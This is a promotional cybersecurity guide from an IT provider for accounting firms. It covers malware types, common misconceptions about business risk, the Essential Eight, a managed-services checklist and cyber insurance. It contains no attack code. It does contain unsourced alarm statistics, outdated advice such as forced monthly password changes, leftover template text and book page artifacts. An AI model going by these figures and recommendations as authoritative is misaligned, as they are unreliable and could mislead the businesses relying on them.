The growth and sophistication of cybercriminals, ransomware and hacker attacks has reached epic levels, and new protections are now required. We have created this report to inform our clients about what’s going on and educate them on new protections we are urging you to put in place.

If your business is the victim of a cybercrime attack where your clients’ data is compromised, you will be labelled careless and irresponsible by your clients. You may even be investigated and questioned about what you did to prevent this from happening – and if the answer is not adequate, you can be found liable, facing serious fines and lawsuits even if you have protections in place. Claiming ignorance is not an acceptable defence, and this giant, expensive and potentially reputation-destroying threat is solely your responsibility to handle.

Please do NOT underestimate the importance and likelihood of these threats.

We’ve been watching these trends and putting in place the latest technologies, protocols and services to protect our clients.

The biggest challenge we face in protecting clients is that many believe “That won’t happen to me” because we’re “too small” or “don’t have anything a cybercriminal would want.” Or they simply think that if it happens, the damages won’t be that significant. That may have held true 10 to 20 years ago but certainly not today.

Don’t think you’re in danger because you’re “small” and not a big company. That’s exactly what cybercriminals are counting on you to believe. It makes you easy prey because you don’t have any protections in place, or grossly inadequate ones at most.

82,000 new malware threats are being released every single day, and half of the cyber-attacks occurring are aimed at small businesses; you just don’t hear about it because the news wants to report on big breaches or it’s kept quiet by the company for fear of attracting bad PR, lawsuits and data-breach fines, and out of sheer embarrassment. But make no mistake – small, “average” businesses are being compromised daily, and clinging to the smug ignorance of “That won’t happen to me” is an absolute surefire way to leave yourself wide open to these attacks.

In fact, the National Cyber Security Alliance reports that one in five small businesses have been victims of cybercrime in the last year – and that number includes only the ones that were reported. Most small businesses are too embarrassed or afraid to report breaches, so it’s safe to assume that the number is much, much higher.

Chapter 1: What are Cybersecurity Threats?

What is a Hack?

It was so much simpler if you borrowed a floppy disc from a friend and popped it into your computer, you ran the risk of catching a computer virus.

The answer to this risk was simple: Most people installed antivirus software that protected their computers for them. And that was it.

But then two big things came along that changed everything: The internet – and greed.

You see, back in the day, most computer viruses were written for fun, and for the hacker to show off their skills. They were trying to break into computers and access information for the challenge, not the financial reward.

These days, hacking is a profession. And a very lucrative one for some. The internet has made it very easy to access hacking knowledge and powerful automated tools.

There’s also organised crime involved in modern day hacking. The criminals are systematic, thorough and ruthless with their attacks.

Believe us when we tell you that all businesses are being targeted by hackers all the time. The automated tools make this easy.

Don’t ever let anyone lull you into a false sense of wellbeing about your IT security.

We see cyber-attacks on businesses virtually every day. Mostly we see evidence of failed attacks, as the businesses we look after are well prepared and protected.

But occasionally we speak to business owners or managers we don’t (yet) look after, who’ve been successfully attacked. And the consequences can be devastating, depending on what has happened to them.

Anything that has been designed to steal your data or hurt your computer systems is now called malware – for “malicious software”.

There are a number of different ways you can be targeted. Being aware is the first defensive weapon.

Types of Threats            

Here’s our guide to the nine most terrifying kinds of malware.

1. Viruses

Malware is much more than just viruses. Which is why you need a greater spread of defense than just antivirus software.

Viruses can attack by infecting other files, deleting them, or reformatting them and making it very difficult to clean up. Often, viruses work by replicating themselves or by flooding networks, making it impossible for you to perform even simple tasks.

Clean up can range from difficult to virtually impossible. In many cases, to get things working again you will need to quarantine or delete the affected files.
And possibly even rebuild the computers from scratch.

2. Worms

Worms have been around since the 90s. They work by just one person opening an infected email… which will then take down the whole network.

The scary thing about worms is that unlike a virus, you don’t need to take any action to spread it. Worms replicate themselves and actually exploit other software to do their job for them.

You may have heard of the ‘iloveyou’ worm, which came out 21 years ago. It affected 50 million Windows machines across the world in just 10 days. That’s how powerful and unstoppable worms can be.

3. Trojans

Trojans - also known as Trojan horses after the Ancient Greek story – have replaced worms as popular hacking tools. They’re the new weapon of choice.

This type of malware takes advantage of its victim’s lack of security knowledge. It usually arrives in the form of an email attachment - and these are becoming more and more authentic looking, so it’s easy to be caught out.

Once you open the attachment… bang… it’s got you.

Trojans can also be pushed onto devices when you land on an infected website.

This kind of malware is difficult to defend against, because they easy to write and are triggered by humans opening them in error.

4. Hybrids

You might associate hybrids with cars that are better for the environment. There’s nothing good about a malware hybrid.

Look back at the first three kinds of malware we’ve talked about, and how difficult they are to protect against.

Now picture the love child of two of these forms of malware quietly arriving to attack your business.

Terrifying. A hybrid is just that – malware with different attributes, such as the disguise of a trojan and the power of a worm.

As you can imagine, with hybrids it can be very difficult to clean up after an attack.

5. Ransomware

This might be 5th on our list, but ransomware is the malware most feared by IT professionals.
Ransomware is absolutely enormous right now. And businesses like yours are the prime target.

It works by encrypting all your data and holding it hostage. You literally have no data at all – no customer records, no files, no emails, nothing. Can you imagine how terrifying that would be?
The hackers demand you pay a ransom for them to free your data and give it back to you. This can be thousands of $$$; often asked for in cryptocurrency (such as Bitcoin) which is harder to trace.

Most ransomware is a trojan, meaning it relies on someone accidentally triggering it by opening an attachment, or visiting an unsecured website.

Sadly, this type of attack is very difficult to recover from - the financial impact can be huge - and that’s without paying the ransom.

Please make sure your files are backed-up regularly to avoid total devastation. And you and your team are trained to spot the symptoms of an impending attack.

Technically this isn’t a different category, but I’ve included it because it poses a real threat to you and your business.

Around half of all malware attacks are delivered by fileless malware, and this is growing all the time.

Where ‘traditional’ malware relies on files to spread and infect, this form of malware relies on memory, or other fileless parts of your computer’s operating system.

This type of attack is much harder to detect and to stop.

7. Adware

You’re on a website. There’s a pop-up. You click on it. And before you know it, some software is installed on your computer. Or there’s a new plugin to your browser. Or your browser no longer uses your search engine of choice.

Adware is often more annoying than dangerous. But it can slow computers down or make you more vulnerable to other attacks. And anything that’s

installed without your express permission is a pest and should be tackled.

Don’t you just love a good word blend?

As you probably guessed, malvertising is malware hidden behind advertising.

Don’t confuse this with adware. Malvertising occurs when a cyber- criminal pays for an advert on a genuine website. When you click on the ad, you’re either redirected to a malicious website, or malware is installed on your device.

Sometimes even genuine ads are compromised. And even more scarily, sometimes you don’t even have to click the ad to be affected. This is called a drive-by download attack.

9. Spyware

Once again, a very descriptive name. Spyware is used to spy on you.

When installed, spyware can monitor the websites you visit, everything you type (this is known as keylogging) and any other information about you and what you’re doing on your device.

It’s a good way for someone to find out your login information and passwords.

Spyware is activated when you click on something you shouldn’t, such as an attachment, a pop-up or notification. Or by downloading media from an unreliable source.

Like adware, this is simpler to remove, but by the time you’ve noticed it, there’s the risk you’ve given away a lot of valuable information.

So, there we have it. The 9 most terrifying types of malware and how they’ll affect you and your business.

The impact that many of these forms of malware can have on a business ranges from simple lost productivity down to total bankruptcy.

This guide is just a simple summary. We don’t want to terrify you with facts and figures. But it’s safe for you to assume that you don’t want to deal with the fall out of a major attack on your business.

Remember what we said right at the start of this guide: All businesses are being targeted by hackers all the time.

You need to make sure you’re doing everything you can to keep your business

safe. This starts with creating a culture of taking your cyber-security very seriously.

Consult with a trusted IT support partner to find out the best blend of software, training and procedures to keep your business safe.

There’s a lot that can be done to protect your business and its data from attack. But it needs to be done before an attack happens.


Chapter 2: Why Cybersecurity is a Major Business Risk 

Ask any business owner how they build their business, and most will tell you they establish relationships with their clients. Those relationships are carefully constructed on trust. The customer entrusts the business to deliver products or services that the customer needs with as few headaches as possible. The customer entrusts the business with information—often extremely sensitive information—and expects the business to be good stewards of that information.

Abuse that trust and the business relationship, so carefully constructed, crumbles like a house of cards. Any business that maintains records containing personal information about their clients sits precariously on a house of cards. That house stands one cybersecurity breach away from utter decimation. Each record containing personal information is a liability for the business storing that information and a meal ticket for the cybercriminal, hoping to gain access to it. Although the sensitive information held varies by industry—my company works heavily with accounting firms—the inherent risks are similar in all industries. If a business operates anywhere in the digital realm, it has something to protect from a cyberattack.

There are several misconceptions around cybersecurity, which I will discuss below, but before that, let me introduce you to what I refer to as the “The Security Dilemma.” I discuss this with clients, and this is becoming more relevant as businesses further embrace the cloud, and the “edges” of the traditional corporate network continue to shift. At the top of the Security Dilemma triangle is secure; the second side is usable and the third is cheap. You can only have two of the three sides, as illustrated below.

As the Security Dilemma triangle shows, you need to invest in security (“Usable & Cheap” is not Secure). The security landscape is one that is continuously evolving, hence the need for continual investment. The question now becomes: where do you invest in getting the highest return (the best security you can afford), and how do you determine your return on this investment?

The first misconception – cybersecurity is an IT issue

There’s a misconception among business owners that cybersecurity is strictly an IT issue, and risk can be eliminated by purchasing a piece of technology. So, what is the difference between Information Technology (IT) and Cybersecurity? 1. Information Technology (IT) focuses on hardware, software, and networks. This includes things such as routers, firewalls, networks, anti-virus, windows patching, and backups. 2. Cybersecurity focuses on people, processes, and policies. This includes staff awareness (i.e., human behavior), legal risks, regulatory compliance, business continuity, incident management, and operational frameworks and policies. Usable + Cheap = Is not secure Usable + Secure = Will not be cheap Secure + Cheap = Will not be usable ON THIN ICE 120Put simply, IT has a “fix-it mentality,” while cybersecurity has a “secure and monitor” mentality. Certainly, the addition of up-to-date technology aids cybersecurity protection. Information technology focusing on hardware and networks is not all there is to cybersecurity. Ninety percent of cybersecurity breaches are caused by human error, not IT systems. Human behaviors, risks, compliance, operational framework, and policies are all factors, as well.

The second misconception – we need to protect everything

The next misconception is that we need to protect everything. Since trying to 'protect everything protects nothing,' companies need to set and follow priorities regarding what data assets to protect, what threats to defend against, and where to spend their money on cybersecurity countermeasures. When we are working with accounting firms, it is especially important to determine where their data is, who has access to the data and who can access the data from where. It is about identifying the “digital crown jewels” of the firm, which is more important than ever when operating in the “Cloud.” But protecting every bit of data equally isn’t a viable strategy, as no business has unlimited funds for security measures. You need to start by identifying what you are trying to protect.

This can include, for example:

  • Your website: Some hackers live for the pure joy of stopping a business from doing business. How long, do you think, your company can survive without the revenue from its e-commerce site or the leads from its well-written landing pages?

  • Documents on your server or in the cloud: What is there and to whom is it valuable?

  • Accounting applications: It’s fair to assume that your business wouldn’t be able to revert to ledgers and calculators in the event a cyber attack disrupted access to your accounting applications.

  • HR Applications: If it is critical to managing your employees, it is critical to your business. Your business must maintain an up-to-date data asset registry. This is a list of every application, the data it stores, where it is, and who has access to it. Identify and establish which data assets are linked together and how they interact.

Ask questions specific to your business, such as:

  • Where can I access each file from?

  • Can I access any corporate networks from the guest Wi-Fi?

  • What are my most valuable data assets, who can access them, and from where can they be accessed?

  • If an attacker compromises the CEO’s user account, what else can they access? • Do all your Cloud Applications used in your business have and enforce Multi-Factor Authentication?

  • What are the security statements and protocols from your Cloud Providers? It is incredibly common for businesses to think they have certain access controls in place, but there is a misconfiguration or a complete lack of security protocol in place. This could be a simple oversite, or even worse, it was requested because the security that was in place was too hard for the user (remember our Security Dilemma triangle). Make sure you manually test every one of the answers to the questions above. Assuming that everything is in order can prove to be a costly mistake.

The third misconception – industry standards are all you need

Another misconception I often hear from business owners is that they are compliant with an industry standard (i.e., NIST Cybersecurity Framework), so this means they are secure. Being compliant with an industry-specific set of control standards (e.g., PCI DSS for payment card processors) is not equivalent to having a robust and effective information security posture. You need to look no further than the massive credit card data exfiltration ON THIN ICE 122at Target a few years ago. Target was certified as being PCI-compliant at the time their breach occurred. Cybersecurity standards are about compliance, but hackers are cunning and devious, always looking for ways to penetrate business defenses or lack thereof. The key here is that compliance does not equal security, nor are they the same thing.

Compliance is a regulatory, one-size-fits-all, point-in-time snapshot that demonstrates you meet the minimum, security-related requirements of specific regulatory standards like PCI or NIST. Security is the whole unique system of policies, processes, and technical controls that define how your organization stores, processes, consumes and distributes data. A key difference between compliance and security is that compliance requirements change slowly and predictably. The security and threat landscape is in a perpetual state of change, which often means compliance is a few steps behind current threats. Just checking those compliance boxes won’t cover all your security needs and can leave your data and systems without adequate protection.

The fourth misconception – underestimate future risk

Everyone has their own definition of risk. Some people will go sky diving, while others will consider a day at the beach as risky. It is difficult for people to assess its true level. People tend to underestimate long-term risks and overestimate short-term risks. Have you ever wondered why people still smoke? Or why climate change is so hard for some people to accept? It is because we tend to underestimate long-term risks. We focus on the news of today, tending to be concerned with what is happening now, and see only what is directly in front of us. Take, for example, the BYOD movement in workplaces.

Employers think it a win for them to have their employees bring their own device (BYOD) to the office. After all, by allowing or encouraging the employee to provide their own laptop or cell phone, the employer avoids the expense of providing those items, and the employee may be more likely to work from home, putting in more hours for the company. Employees probably do not have the same level of security on their personal devices that a company device would have, thereby making it easier for a hacker to compromise the corporate system while the personal device is connected to the network. Saving $1000 on a laptop in the short run can lead to cybersecurity issues in the long run, resulting in downtime, loss of revenue, and potential fines. Many businesses forgo employee cybersecurity training to avoid the expense. They rationalize it by saying, “My staff would know not to click that link.” However, that same staff member will do exactly that if they think the email is from their boss. That tendency goes back to the employee’s understanding of risk; they see the risk potential as somewhere down the road, not an immediate threat. On the flip side of the coin, employees do see a risk in questioning their bosses.

The risk of disappointing the boss is immediate, and the retribution swift. The employee who just opened a hacker’s email will defend his action by saying, “It had my boss's email address. It had my boss's name on it. I believed it was my boss instructing me to do something, and it's not my job to question it.” Complicating the issue, employers tend to trust their employees. “My employee would never do that,” they say. However, one company had to pay ransom to a hacker not once, but twice, because of the negligent actions of the same employee. This is not about personal trust (which society depends on), but about digital trust. Digital trust refers to the connections between people, data, and networks. How are you doing this in your business? So, trust your employees, but never underestimate the risks.

The fifth misconception – not planning for disaster

Companies map out the trajectory of the business in six months, oneyear, and five-year increments. They plan for all the positives but fail to plan for failures. When cybersecurity threats manifest, they have no ON THIN ICE 124business continuity plan in place. Once that employee opens an email containing a ransomware payload, there is no control-alt-delete to stop the process. The only way out for your business is through it. The clock is ticking.

A business continuity plan is a comprehensive guide to protecting your business from known cybersecurity threats, as well as a recovery plan for the aftermath of the unthinkable. Just like our Fourth Misconception (Underestimate Future Risk), most businesses underestimate the amount of time a recovery can take. What’s the plan if you cannot recover?

Summary

Cybersecurity, at the end of the day, is about balancing people, processes, and technology, like the house of cards. With a finite set of resources—a 52 card deck—you can choose to construct a tall house or a wider, more stable one. You may remove a card to reposition it, as long as you are aware of the weakness its removal creates in the structure. And you must have a plan for when the unexpected breeze wreaks havoc, and you are forced to rebuild.


Chapter 3: How to Manage a Cyber Attack on Your Business? 

You should know there is absolutely no way we, or anyone else, can 100% guarantee you won’t get compromised – you can only put smart protections in place to greatly reduce the chances of this happening, to protect data so it is recoverable and to demonstrate to your employees and clients that you were responsible and not careless.

What’s worse than a data breach? Trying to cover it up. Companies like Yahoo! are learning that lesson the hard way, facing multiple class-action lawsuits for not telling their users immediately when they discovered they were hacked. With Dark Web monitoring and forensics tools, WHERE data gets breached is easily traced back to the company and website, so you cannot hide it.

One of the things we want to discuss with you is how to ensure you are compliant and you stay compliant.

One breach, one ransomware attack, one rogue employee you are not protected against, can create HOURS of extra work for staff who are already maxed out when things are going well. Then there’s business interruption and downtime, backlogged work delivery for your current clients. Loss of sales. Forensics costs to determine what kind of hack attack occurred, what part of the network is/was affected and what data was compromised. Emergency IT restoration costs for getting you back up, if that’s even possible. In some cases, you’ll be forced to pay the ransom and maybe – just maybe – they’ll give you your data back. Then there are legal fees and the cost of legal counsel to help you respond to your clients and the media. Cash flow will be significantly disrupted, budgets blown up. Some states require companies to provide one year of credit-monitoring services to consumers affected by a data breach and more are following suit.

Bank Fraud:
If your bank account is accessed and funds stolen, the bank is NOT responsible for replacing those funds. Take the true story of Verne Harnish, CEO of Gazelles, Inc., a very successful and well-known consulting firm, and author of the best-selling book The Rockefeller Habits.

Harnish had $400,000 taken from his bank account when hackers were able to access his PC and intercept e-mails between him and his assistant. The hackers, who are believed to be based in China, sent an e-mail to his assistant asking her to wire funds to 3 different locations. It didn’t seem strange to the assistant because Harnish was then involved with funding several real estate and investment ventures. The assistant responded in the affirmative, and the hackers, posing as Harnish, assured her that it was to be done. The hackers also deleted his daily bank alerts, which he didn’t notice because he was busy running the company, traveling and meeting with clients. That money was never recovered and the bank is not responsible.

Some hackers don’t lock your data for ransom or steal money. Often they use your server, website or profile to spread viruses and/or compromise other PCs. If they hack your website, they can use it to relay spam, run malware, build SEO pages or promote their religious or political ideals. (Side note: This is why you also need advanced endpoint security, spam filtering, web gateway security, SIEM and the other items detailed in this report, but more on those in a minute.)

Below is a list of things we recommend all clients have in place ASAP. Some you may already have, and some may be lacking, which is why we are currently contacting all clients to conduct a review of their current situation.

QBRs Or Quarterly Business Reviews And Security Risk Assessments: We will be more persistent in scheduling and holding these meetings with all clients. During these consultations, we will conduct a security risk assessment and provide you with a score. We will also brief you on current projects, review your IT plan and budgets, discuss NEW tools and solutions we feel you may need, and make recommendations. We will also answer any questions you have and make sure you are satisfied with our services. [Fill in anything else you do during these meetings.]

Proactive Monitoring, Patching, Security Updates: This is what we deliver in our Managed IT Services Plan.

Insurance Review: At least once a year, we will provide you with a copy of our policies and protections for YOU. We can also work with your insurance agent to review your cyber liability, crime and other relevant policies to ensure we, as your IT company, and you, as a company, are fulfilling their requirements for coverage.

Data Breach And Cyber-Attack Response Plan: This is a time- and-cost-saving tool as well as a stress-reduction plan. We will be working with our clients to create and maintain a cyber-response plan so that IF a breach happens, we could minimize the damages, downtime and losses, and properly respond to avoid missteps.

Ransomware Backup And Disaster Recovery Plan: One of the reasons the WannaCry virus was so devastating was because it was designed to find, corrupt and lock BACKUP files as well.

A Mobile And Remote Device Security Policy: All remote devices – from laptops to cell phones – need to be backed up, encrypted and have a remote “kill” switch that would wipe the data from a lost or stolen device. You also need to have a policy in place for what employees can and cannot do with company-owned devices, how they are to responsibly use them and what to do if the device is lost or stolen.

More Aggressive Password Protocols: Employees choosing weak passwords are STILL one of the biggest threats to organizations. To protect against this, we will require a monthly password update for all employees and put in place controls to ensure weak, easy-to-crack passwords are never used. We will also have checklists for employees who are fired or quit to shut down their access to critical company data and operations.

Advanced Endpoint Security: There has been considerable talk in the IT industry that antivirus is dead, unable to prevent the sophisticated attacks we’re seeing today.

Multi-Factor Authentication: Depending on your situation, we will be recommending multi-factor authentication for access to critical data and applications.

Web-Filtering Protection: Porn and adult content is the #1 thing searched for online, most often during the 9-to-5 workday. Online gaming, gambling and file-sharing sites for movies and music are also ranked in the top searches and are “click bait” hunting grounds for hackers. These are sites you do NOT want your employees visiting during work hours on company-owned devices. If your employees are going to infected websites, or websites you DON’T want them accessing at work, they can not only expose you to viruses and hackers, but they can also get you nailed for sexual harassment and child pornography lawsuits – not to mention the distraction and time wasted on YOUR payroll, with YOUR company-owned equipment. All of this can (and should) be blocked from company-owned Internet and devices.

Cyber Security Awareness Training: Employees accidentally clicking on a phishing e-mail or downloading an infected file or malicious application is still the #1 way cybercriminals hack into systems. Training your employees FREQUENTLY is one of the most important protections you can put in place. Seriously. We have several new solutions we can discuss with you to inform and remind your employees to be on high alert and reduce their likelihood of clicking on the wrong e-mail or succumbing to other scams.

Protections For Sending/Receiving Confidential Information Via E-mail: Employees have access to a wide variety of electronic information that is both confidential and important. That’s why we’ll be ensuring all clients’ e-mail systems are properly configured to prevent the sending and receiving of protected data.

Secure Remote Access Protocols: You and your employees should never connect remotely to your server or work PC using GoToMyPC, LogMeIn or TeamViewer. Remote access should strictly be via a secure VPN (virtual private network). For our clients who need this type of access, we will be implementing proper technologies that are secure.

Dark Web/Deep Web ID Monitoring: There are new tools available that monitor cybercrime websites and data for YOUR specific credentials being sold or traded. Once such breaches are detected, these tools notify you immediately so you can change your password and be on high alert.

On our own initiative, we have conducted a more thorough, CONFIDENTIAL investigation of your computer network, backups and security protocols as outlined in this report and have generated a custom “Risk Assessment Health Score.”

This score is based on a number of factors including, but not limited to, the type of data you have, regulatory compliance you may need to adhere to and other unique factors such as the number of employees you have, locations, nature of your business, etc.


Chapter 4: How to Create Your Cybersecurity Strategy 

To start with, you’ll need to consider the following points to ensure your business is properly protected:

  • You need to have support from everyone in the business from top to bottom to ensure your approach is employed.
  • Businesses with high cyber-resilience all consider support and oversight from management as the most important factor.

When it comes to cyber-attacks, it’s not a matter of if, but when.

  • Cyber security is everyone’s business. All staff should know safe online practices.
  • Although you can find countless approaches promoting many useful actions, there is no single fix for cyber security.
  • Aiming to implement many actions, even if only to a small degree, is the best long-term approach to maximise protection with limited resources. Consider the full range of actions, rather than selecting a few.

IT Security Framework is a set of guidelines, or a kind of template that can be applied to your business and cyber security protocols to protect your security perimeter and minimise your risk of attack. The two most common frameworks in Australia are the Essential Eight (from Australian Cyber Security Centre) and The National Institute of Standards and Technology (NIST) is the US agency for industry standardisation and measurements.

CPA Australia has built their IT security framework around securing your information and system management, in order to protect client’s sensitive information. This framework is based on the Essential Eight from the Australian Cyber Security Centre.
 
Most of the listed IT security frameworks focus on a risk-management approach, meaning these guidelines are easily adapted to match your needs, and applicable to your business to target the specific risks that threaten your IT Security. 

As the Australian Cyber Security Centre (ASCS) warns, business owners and managers must weigh investment in cybersecurity against other business needs and consider the overall level of cyber risk, the business’s exposure to such risks, and the potential whole-of-business cost that could be incurred if a serious cyber incident were to occur on the network.

A layered approach to security is required and if we follow “The Essential Eight” from the Australian Signals Directorate we are moving in the right direction. However even this is not enough, and they refer to “The Essential Eight” as a baseline.

According to the Australian Signals Directorate:
“While no single mitigation strategy is guaranteed to prevent cyber security incidents, organisations are recommended to implement eight essential mitigation strategies as a baseline. This baseline, known as the Essential Eight, makes it much harder for adversaries to compromise systems. Furthermore, implementing the Essential Eight proactively can be more cost-effective in terms of time, money and effort than having to respond to a successful large-scale cyber security incident”.

The ASD Essential Eight consists of:

  • Mitigation strategies to prevent malware delivery and execution
    • Application whitelistingof approved/trusted programs to prevent execution of unapproved/malicious programs including .exe, DLL, scripts (e.g. Windows Script Host, PowerShell and HTA) and installers.
    • Patch applicationsg. Flash, web browsers, Microsoft Office, Java and PDF viewers. Patch/mitigate computers with ‘extreme risk’ vulnerabilities within 48 hours. Use the latest version of applications.
    • Configure Microsoft Office macro settingsto block macros from the Internet, and only allow vetted macros either in ‘trusted locations’ with limited write access or digitally signed with a trusted certificate.
    • User application hardening. Configure web browsers to block Flash (ideally uninstall it), ads and Java on the Internet. Disable unneeded features in Microsoft Office (e.g. OLE), web browsers and PDF viewers.
  • Mitigation strategies to limit the extent of cyber security incidents
    • Restrict administrative privilegesto operating systems and applications based on user duties. Regularly revalidate the need for privileges. Don’t use privileged accounts for reading email and web browsing.
    • Patch operating systems.Patch/mitigate computers (including network devices) with ‘extreme risk’ vulnerabilities within 48 hours. Use the latest operating system version. Don’t use unsupported versions.
    • Multi-factor authenticationincluding for VPNs, RDP, SSH and other remote access, and for all users when they perform a privileged action or access an important (sensitive/high availability) data repository.
       
  • Mitigation strategies to recover data and system availability
    • Daily backups of important new/changed data, software and configuration settings, stored disconnected, retained for at least three months. Test restoration initially, annually and when IT infrastructure changes.

So, are you ready to protect your business properly from the threat of CyberSecurity? We will assist you with taking firm ownership of your data by implementing the highest protection measures available. Don’t fall victim to this ongoing threat when we have all the answer available here for you ready to go

↑ Back to Top


Chapter 5: Implementation of Successful Cybersecurity Insurance

A cybersecurity threat can not only lead to the loss of your firm’s key data but financially drain your business as well. When your IT system is taken over by ransomware, basically your entire company is held hostage.
Even though cyber attacks went up by 700% last year, many accounting firms are still completely unprepared for an attack.

Therefore, a cyber insurance policy that covers you in the event of ransomware is a MUST HAVE for all firms. Read on to learn about why your accounting business needs this type of technology insurance to protect it from a hack.

What is ransomware?
Malicious software that infects a computer with display messages that demand a fee needs to get paid is considered to be ransomware. Before your IT system can work again, the ransom must be paid.
This malware technique is a moneymaking scheme that is installed through deceptive links. This could happen through phishing emails, calendar invitations, instant messages, or on a website. Once these links are clicked, they can encrypt files or lock the entire computer screen.
The ransomware attack rate in Australia is far from the global average. In fact, 67% of Australian organisations experienced this issue in the last 12 months.

Protecting your firm
There are steps you can take to protect your firm from an attack, but without ransomware insurance, there is still a high risk. Along with getting the proper business insurance, you can do the following:
• Update software regularly
• Never open unsolicited emails
• Backup data regularly
• Restrict software privileges within the workplace
• Enable spam filters
• Use firewalls to block suspicious content
• Use strong passwords and multi-factor authentication
• Scan all emails for threats
With how much technology has advanced, you can get hacked even when you are being safe. Having the right insurance coverage is the only sure way to protect your business.

Cyber insurance
Cyber insurance can cover expenses and other financial losses due to a cyber event like malware attacks, cyber extortion, social engineering, or other invasive software.
A cyber policy typically covers three things, even though the policy may be broad. With a policy, you get covered for liability (regulatory defence and privacy lawsuits), internal financial loss (notification expenses, business interruption, extortion, data recovering, and crime/theft), and emergency incident response (covering costs that were lost due to a cyber event).

• Typically, a main coverage cyber policy includes:
• Privacy breach notification & crisis management costs
• Privacy & security liability
• Business interruption – loss of profits & operational expenses
• Data recovery & system damage
• Regulatory defence and fine
• Media liability
• Social engineering & funds transfer fraud
• Payment card data security liability

Cybersecurity will continue to be a hot topic in all industries and all business sizes. The threat is ongoing and is not going away any time soon. The best way to ensure your firm is protected outside of installing the best technological protection is to also have the best insurance cover possible.

For more advice on how to protect your business from cybercrime, please call me for a chat. 

 


Looking forward to hearing from you soon.

Iain Enticott - Technology for Accountants